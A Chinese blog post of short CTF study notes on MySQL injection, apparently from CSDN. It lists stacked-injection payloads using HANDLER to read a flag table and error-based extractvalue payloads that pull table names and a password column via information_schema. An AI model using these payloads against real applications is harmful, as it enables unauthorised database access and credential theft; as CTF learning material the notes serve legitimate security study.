# SQL

于 2021-07-17 21:16:03 发布
阅读量77 收藏
点赞数
分类专栏: 笔记 CTF 文章标签: mysql 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yaoge1225/article/details/118862758
版权
笔记 同时被 2 个专栏收录
18 篇文章 0 订阅
订阅专栏
CTF
15 篇文章 0 订阅
订阅专栏

SQL

load_file()函数读取一个文件并将其内容作为字符串返回 其中file_name是文件的完整路径。

堆叠注入

1';show databases;#
1';show tables;#
1';show columns from FlagHere;#
1'; HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#

一个知识点:
HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭

读取FLAG的内容

报错注入

1'^extractvalue(1,concat(0x7e,(select(database()))))#
1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables))))#
1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))#
1'^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))#

{left(),right()}
like代替=

_Stary
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
## SQL语言: 介绍、使用技巧和经典案例
04-21
### SQL语言: 介绍、使用技巧和经典案例 #### 一、SQL语言简介 SQL(Structured Query Language),即结构化查询语言,是一种被广泛应用于管理与操作关系型数据库的标准编程语言。通过SQL,用户能够执行诸如查询...
sjqzhang#webtech#SQL 日期1
07-25
MySQL Date 函数下面的表格列出了 MySQL 中最重要的内建日期函数:SQL Server Date 函数下面的表格列出了 SQL Server 中最
# Sql 常用语句
不积跬步,无以至千里;不积小流,无以成江海
04-26 1002
常用工具Sql explain 查看Sql执行计划 explain select * from testone order by age asc limit 0,3; 查看所有进程 show full processlist; 查询事物 select * from information_schema.INNODB_TRX it ; 结束进程:kill {id} DDL 创建数据库 create database ldtest; 删除数据库 drop databases test; 创建新表
#SQL简介
weixin_30279751的博客
09-20 347
SQL是结构化查询语言(Structured Query Language)简称,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统。 MySQL是一个关系型数据库管理系统(RDBMS),由瑞典MySQL AB公司开发,目前属于Oracle旗下产品。MySQL是最流行的关系型数据库管理系统之一。 结构化查询语言包含6个部分: 数据查询语言(DQL:Data Q...
SQL语句
silence_lu_的博客
08-01 417
区别: (1)#将传入的数据都当成一个字符串,会对自动传入的数据加一个双引号。如:order by #user_id#,如果传入的值是id,则解析成的sql为order by "id"。 (2)$将传入的数据直接显示生成在sql中。如:order by $user_id$,如果传入的值是id,则解析成的sql为order by id。 (3)#方式在很大程度上能够防止sql注入。 (4)$...
SQL中#和$的区别以及使用它们会造成的问题
qq_37511997的博客
05-17 2260
不同点 ●使用#获取传入的数据会在数据上加上引号。比如 where userId = #{userId },如果userId传入的值为1,那最终的sql就是 where userId = “1”; ●使用$获取传入的数据不会对数据做任何改变,比如 where userId = #{userId },如果userId传入的值为1,那最终的sql就是 where userId = 1; ● #能够一定程度上防止SQL注入 ● $无法防止SQL注入 ● $一般用于传入数据库对象,例如传入表名。(仍会存在S
sql中 ${}和#{}的区别
热门推荐
XuJiangDong
08-11 1万+
<span style="font-size:18px;">delete from ups_role_permission_dataparams where role_id = #{roleId,jdbcType=INTEGER}</span> 在这里用到了#{},使用#时:1、用来传入参数,sql在解析的时候会加上” “,当成字符串来解析 ,如这里 role_id = “
ZGG2016#sql-practice-niuke#SQL33:创建一个actor表,包含如下列信息1
07-25
1、题目 2、题解 3、涉及内容
caofanCPU#JavaBooks#sql-存储引擎1
07-25
引言sql-存储引擎是 MySQL 默认的事务型存储引擎,只有在需要它不支持的特性时,才考虑使用其它存储引擎。实现了四个标准的隔离级别,默认级别是可重复读(RE
ZGG2016#sql-practice-niuke#SQL48:将所有获取奖金的员工当前的薪水增加10%1
07-25
1、题目 2、题解 3、涉及内容
#SQL#
阿漆的博客
10-09 361
EXPLAIN MySQL会根据配置文件会限制server接受的数据包的大小。如果写入大数据时,因为默认的配置太小,插入和更新操作会因为 max_allowed_packet 参数限制,而导致失败。 gh-ost 添加一条和张三一样的数据,但是名字改李四 insert into table (name,data)(select '李四',data from table where nam...
sql中#与$的区别
我的博客
03-08 9436
在这里用到了#{},使用#时:1、用来传入参数,sql在解析的时候会加上” “,当成字符串来解析 ,如这里 role_id = “roleid”;2、#{}能够很大程度上防止sql注入;延伸:1、用传入数据直接显示在生成的sql中,如上面的语句,用roleid=传入数据直接显示在生成的sql中,如上面的语句,用roleid={roleId,jdbcType=INTEGER},那么sql在解析的时候...
sql中 # 和 $ 的区别
u013232219的博客
02-20 1930
三:sql中 # 和 $ 的区别: #可以防止sql注入 #是占位符,在DBMS才进行替换,在预编译时使用?占位,能防止sql注入; deletefromuserwherename = ?; 而传入的参数将会经过PreparedStatement方法的强制类型检查和安全检查等处理,最后作为一个合法的字符串传入。 在#{}预...
sql中#和$的区别
赏樱看雪撸代码
10-16 2272
#{}在预编译的过程中会自动用一个占位符?代替变量**【预编译处理】** select * from user where name = ?; ${}在sql处理的过程中只是简单的字符串替换**【字符串替换】** select * from user where name = 'test'; #{} 的参数替换是发生在 DBMS 中,而 KaTeX parse error: Expected ...
sql 中 ${} 和 #{}的区别
try to do
07-18 8454
转自 https://blog.csdn.net/qq_15901351/article/details/82290032 项目开发过程中,在mybaitis框架中,sql经常需要动态赋值,会出现#{param} 、${param}两种形式。 接下来,我们一起来看一个案例:根据用户的姓名来筛选用户信息,其中用户姓名不确定,是动态变化的,sql如下: select * from userInfo ...
SQL注入(三)#sql注入 bugku
pumpkin9
04-12 1166
宽字节注入 原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个 汉字(前一个 ascii码大于 128 才能到汉字的范围)。我们在过滤 ’ 的时候,往往利用的思 路是将 ‘ 转换为 \’ (转换的函数或者思路会在每一关遇到的时候介绍)。 因此我们在此想办法将 ‘ 前面添加的 \ 除掉,一般有两种思路: 1、%df 吃掉 \ 具体的原因是 urlen...
### SQL: insert into CJ_YBM_STUDENT ( ) values ( ) ### Cause: java.sql.SQLSyntaxErrorException: ORA-00928: 缺失 SELECT 关键字
最新发布
06-08
这个错误提示是因为在 SQL 语句中,insert into 后面没有指定列名和值,导致语法错误。正确的 SQL 语句应该是: ``` INSERT INTO CJ_YBM_STUDENT (column1, column2, column3, ...) VALUES (value1, value2, value3...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值